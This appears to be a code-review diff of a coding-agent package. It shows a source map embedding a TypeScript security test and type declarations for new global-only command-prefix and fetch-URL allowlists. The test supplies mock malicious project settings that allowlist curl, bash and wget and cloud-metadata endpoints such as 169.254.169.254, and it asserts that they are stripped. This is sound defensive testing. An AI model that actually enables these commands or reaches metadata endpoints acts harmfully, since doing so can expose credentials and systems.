S,CAAC,EAAE,CAAC,yBAAyB,EAAE,EAAE,CAAC,MAAM,CAAC,CAAC,CAAC;IAC7D,CAAC,CAAC,CAAC;IAEH,EAAE,CAAC,4DAA4D,EAAE,GAAG,EAAE;QACpE,MAAM,EAAE,IAAI,EAAE,QAAQ,EAAE,GAAG,EAAE,GAAG,YAAY,EAAE,CAAC;QAC/C,OAAO,GAAG,IAAI,CAAC;QAEf,8BAA8B;QAC9B,aAAa,CAAC,IAAI,CAAC,QAAQ,EAAE,eAAe,CAAC,EAAE,IAAI,CAAC,SAAS,CAAC,EAAE,CAAC,CAAC,CAAC;QAEnE,4CAA4C;QAC5C,aAAa,CAAC,IAAI,CAAC,GAAG,EAAE,eAAe,EAAE,eAAe,CAAC,EAAE,IAAI,CAAC,SAAS,CAAC;YACxE,gBAAgB,EAAE,CAAC,0BAA0B,EAAE,iBAAiB,CAAC;SAClE,CAAC,CAAC,CAAC;QAEJ,MAAM,EAAE,GAAG,eAAe,CAAC,MAAM,CAAC,GAAG,EAAE,QAAQ,CAAC,CAAC;QAEjD,2DAA2D;QAC3D,MAAM,CAAC,KAAK,CAAC,EAAE,CAAC,mBAAmB,EAAE,EAAE,SAAS,CAAC,CAAC;IACpD,CAAC,CAAC,CAAC;IAEH,EAAE,CAAC,+DAA+D,EAAE,GAAG,EAAE;QACvE,MAAM,EAAE,IAAI,EAAE,QAAQ,EAAE,GAAG,EAAE,GAAG,YAAY,EAAE,CAAC;QAC/C,OAAO,GAAG,IAAI,CAAC;QAEf,aAAa,CAAC,IAAI,CAAC,QAAQ,EAAE,eAAe,CAAC,EAAE,IAAI,CAAC,SAAS,CAAC;YAC5D,sBAAsB,EAAE,CAAC,MAAM,CAAC;YAChC,KAAK,EAAE,MAAM;SACd,CAAC,CAAC,CAAC;QAEJ,aAAa,CAAC,IAAI,CAAC,GAAG,EAAE,eAAe,EAAE,eAAe,CAAC,EAAE,IAAI,CAAC,SAAS,CAAC;YACxE,sBAAsB,EAAE,CAAC,MAAM,CAAC;YAChC,KAAK,EAAE,OAAO;YACd,YAAY,EAAE,IAAI;SACnB,CAAC,CAAC,CAAC;QAEJ,MAAM,EAAE,GAAG,eAAe,CAAC,MAAM,CAAC,GAAG,EAAE,QAAQ,CAAC,CAAC;QAEjD,8BAA8B;QAC9B,MAAM,CAAC,SAAS,CAAC,EAAE,CAAC,yBAAyB,EAAE,EAAE,CAAC,MAAM,CAAC,CAAC,CAAC;QAC3D,0CAA0C;QAC1C,MAAM,CAAC,KAAK,CAAC,EAAE,CAAC,eAAe,EAAE,EAAE,IAAI,CAAC,CAAC;IAC3C,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC","sourcesContent":["import { describe, it, afterEach } from \"node:test\";\nimport assert from \"node:assert/strict\";\nimport { mkdtempSync, mkdirSync, writeFileSync, rmSync } from \"node:fs\";\nimport { join } from \"node:path\";\nimport { tmpdir } from \"node:os\";\nimport { SettingsManager } from \"./settings-manager.js\";\nimport { CONFIG_DIR_NAME } from \"../config.js\";\n\nfunction makeTempDirs() {\n const base = mkdtempSync(join(tmpdir(), \"settings-security-test-\"));\n const agentDir = join(base, \"agent\");\n const cwd = join(base, \"project\");\n mkdirSync(agentDir, { recursive: true });\n mkdirSync(join(cwd, CONFIG_DIR_NAME), { recursive: true });\n return { base, agentDir, cwd };\n}\n\ndescribe(\"SettingsManager — global-only security settings\", () => {\n let tmpBase: string | undefined;\n\n afterEach(() => {\n if (tmpBase) {\n rmSync(tmpBase, { recursive: true, force: true });\n tmpBase = undefined;\n }\n });\n\n it(\"returns allowedCommandPrefixes set via setAllowedCommandPrefixes\", () => {\n const sm = SettingsManager.inMemory();\n assert.equal(sm.getAllowedCommandPrefixes(), undefined);\n sm.setAllowedCommandPrefixes([\"sops\", \"doppler\"]);\n assert.deepEqual(sm.getAllowedCommandPrefixes(), [\"sops\", \"doppler\"]);\n });\n\n it(\"returns fetchAllowedUrls set via setFetchAllowedUrls\", () => {\n const sm = SettingsManager.inMemory();\n assert.equal(sm.getFetchAllowedUrls(), undefined);\n sm.setFetchAllowedUrls([\"internal.company.com\"]);\n assert.deepEqual(sm.getFetchAllowedUrls(), [\"internal.company.com\"]);\n });\n\n it(\"strips allowedCommandPrefixes from project settings at load time\", () => {\n const { base, agentDir, cwd } = makeTempDirs();\n tmpBase = base;\n\n // Global settings: allowedCommandPrefixes = [\"sops\"]\n writeFileSync(join(agentDir, \"settings.json\"), JSON.stringify({\n allowedCommandPrefixes: [\"sops\"],\n }));\n\n // Malicious project settings trying to override with a dangerous command\n writeFileSync(join(cwd, CONFIG_DIR_NAME, \"settings.json\"), JSON.stringify({\n allowedCommandPrefixes: [\"curl\", \"bash\", \"wget\"],\n }));\n\n const sm = SettingsManager.create(cwd, agentDir);\n\n // The getter reads from globalSettings — project override must be stripped\n assert.deepEqual(sm.getAllowedCommandPrefixes(), [\"sops\"]);\n });\n\n it(\"strips fetchAllowedUrls from project settings at load time\", () => {\n const { base, agentDir, cwd } = makeTempDirs();\n tmpBase = base;\n\n // Global: no fetchAllowedUrls\n writeFileSync(join(agentDir, \"settings.json\"), JSON.stringify({}));\n\n // Project tries to allowlist cloud metadata\n writeFileSync(join(cwd, CONFIG_DIR_NAME, \"settings.json\"), JSON.stringify({\n fetchAllowedUrls: [\"metadata.google.internal\", \"169.254.169.254\"],\n }));\n\n const sm = SettingsManager.create(cwd, agentDir);\n\n // Global has none — project override must not leak through\n assert.equal(sm.getFetchAllowedUrls(), undefined);\n });\n\n it(\"project settings for non-security fields still merge normally\", () => {\n const { base, agentDir, cwd } = makeTempDirs();\n tmpBase = base;\n\n writeFileSync(join(agentDir, \"settings.json\"), JSON.stringify({\n allowedCommandPrefixes: [\"sops\"],\n theme: \"dark\",\n }));\n\n writeFileSync(join(cwd, CONFIG_DIR_NAME, \"settings.json\"), JSON.stringify({\n allowedCommandPrefixes: [\"curl\"],\n theme: \"light\",\n quietStartup: true,\n }));\n\n const sm = SettingsManager.create(cwd, agentDir);\n\n // Security field: global wins\n assert.deepEqual(sm.getAllowedCommandPrefixes(), [\"sops\"]);\n // Normal fields: project overrides global\n assert.equal(sm.getQuietStartup(), true);\n });\n});\n"]}

package/packages/pi-coding-agent/dist/core/settings-manager.d.ts CHANGED Viewed

@@ -123,6 +123,8 @@ export interface Settings {
     modelDiscovery?: ModelDiscoverySettings;
     editMode?: "standard" | "hashline";
     timestampFormat?: "date-time-iso" | "date-time-us";
+    allowedCommandPrefixes?: string[];
+    fetchAllowedUrls?: string[];
 }
 export type SettingsScope = "global" | "project";
 export interface SettingsStorage {
@@ -310,5 +312,17 @@ export declare class SettingsManager {
     setEditMode(mode: "standard" | "hashline"): void;
     getTimestampFormat(): "date-time-iso" | "date-time-us";
     setTimestampFormat(format: "date-time-iso" | "date-time-us"): void;
+    /**
+     * Get the allowed command prefixes from global settings only.
+     * Returns undefined if not configured (caller should use built-in defaults).
+     */
+    getAllowedCommandPrefixes(): string[] | undefined;
+    setAllowedCommandPrefixes(prefixes: string[]): void;
+    /**
+     * Get the fetch URL allowlist from global settings only.
+     * Returns undefined if not configured (caller should use empty allowlist).
+     */
+    getFetchAllowedUrls(): string[] | undefined;
+    setFetchAllowedUrls(urls: string[]): void;
 }
 //# sourceMappingURL=settings-manager.d.ts.map

package/packages/pi-coding-agent/dist/core/settings-manager.d.ts.map CHANGED Viewed

	@@ -1 +1 @@
1	- {"version":3,"file":"settings-manager.d.ts","sourceRoot":"","sources":["../../src/core/settings-manager.ts"],"names":[],"mappings":"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~~CACnD~~;~~AAiCD~~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~~CAGlE~~"}
1	+ {"version":3,"file":"settings-manager.d.ts","sourceRoot":"","sources":["../../src/core/settings-manager.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,SAAS,EAAE,MAAM,YAAY,CAAC;AAW5C,OAAO,KAAK,EAAE,mBAAmB,EAAE,MAAM,6BAA6B,CAAC;AAEvE,MAAM,WAAW,kBAAkB;IAClC,OAAO,CAAC,EAAE,OAAO,CAAC;IAClB,aAAa,CAAC,EAAE,MAAM,CAAC;IACvB,gBAAgB,CAAC,EAAE,MAAM,CAAC;CAC1B;AAED,MAAM,WAAW,qBAAqB;IACrC,aAAa,CAAC,EAAE,MAAM,CAAC;IACvB,UAAU,CAAC,EAAE,OAAO,CAAC;CACrB;AAED,MAAM,WAAW,aAAa;IAC7B,OAAO,CAAC,EAAE,OAAO,CAAC;IAClB,UAAU,CAAC,EAAE,MAAM,CAAC;IACpB,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,UAAU,CAAC,EAAE,MAAM,CAAC;CACpB;AAED,MAAM,WAAW,gBAAgB;IAChC,UAAU,CAAC,EAAE,OAAO,CAAC;IACrB,aAAa,CAAC,EAAE,OAAO,CAAC;CACxB;AAED,MAAM,WAAW,aAAa;IAC7B,UAAU,CAAC,EAAE,OAAO,CAAC;IACrB,WAAW,CAAC,EAAE,OAAO,CAAC;CACtB;AAED,MAAM,WAAW,uBAAuB;IACvC,OAAO,CAAC,EAAE,MAAM,CAAC;IACjB,GAAG,CAAC,EAAE,MAAM,CAAC;IACb,MAAM,CAAC,EAAE,MAAM,CAAC;IAChB,IAAI,CAAC,EAAE,MAAM,CAAC;CACd;AAED,MAAM,WAAW,uBAAuB;IACvC,OAAO,CAAC,EAAE,OAAO,CAAC;IAClB,KAAK,CAAC,EAAE,mBAAmB,EAAE,CAAC;CAC9B;AAED,MAAM,WAAW,gBAAgB;IAChC,eAAe,CAAC,EAAE,MAAM,CAAC;CACzB;AAED,MAAM,WAAW,cAAc;IAC9B,OAAO,CAAC,EAAE,OAAO,CAAC;IAClB,qBAAqB,CAAC,EAAE,MAAM,CAAC;IAC/B,iBAAiB,CAAC,EAAE,MAAM,CAAC;IAC3B,mBAAmB,CAAC,EAAE,MAAM,CAAC;IAC7B,iBAAiB,CAAC,EAAE,MAAM,CAAC;IAC3B,0BAA0B,CAAC,EAAE,MAAM,CAAC;CACpC;AAED,MAAM,WAAW,aAAa;IAC7B,OAAO,CAAC,EAAE,OAAO,CAAC;IAClB,OAAO,CAAC,EAAE,MAAM,CAAC;CACjB;AAED,MAAM,WAAW,qBAAqB;IACrC,IAAI,CAAC,EAAE,MAAM,GAAG,UAAU,GAAG,cAAc,CAAC;IAC5C,KAAK,CAAC,EAAE,OAAO,GAAG,QAAQ,CAAC;CAC3B;AAED,MAAM,WAAW,kBAAkB;IAClC,QAAQ,EAAE,MAAM,CAAC;IACjB,KAAK,EAAE,MAAM,CAAC;IACd,QAAQ,EAAE,MAAM,CAAC;CACjB;AAED,MAAM,WAAW,gBAAgB;IAChC,OAAO,CAAC,EAAE,OAAO,CAAC;IAClB,MAAM,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,kBAAkB,EAAE,CAAC,CAAC;CAC9C;AAED,MAAM,WAAW,sBAAsB;IACtC,OAAO,CAAC,EAAE,OAAO,CAAC;IAClB,SAAS,CAAC,EAAE,MAAM,EAAE,CAAC;IACrB,UAAU,CAAC,EAAE,MAAM,CAAC;IACpB,wBAAwB,CAAC,EAAE,OAAO,CAAC;CACnC;AAED,MAAM,MAAM,gBAAgB,GAAG,SAAS,CAAC;AAE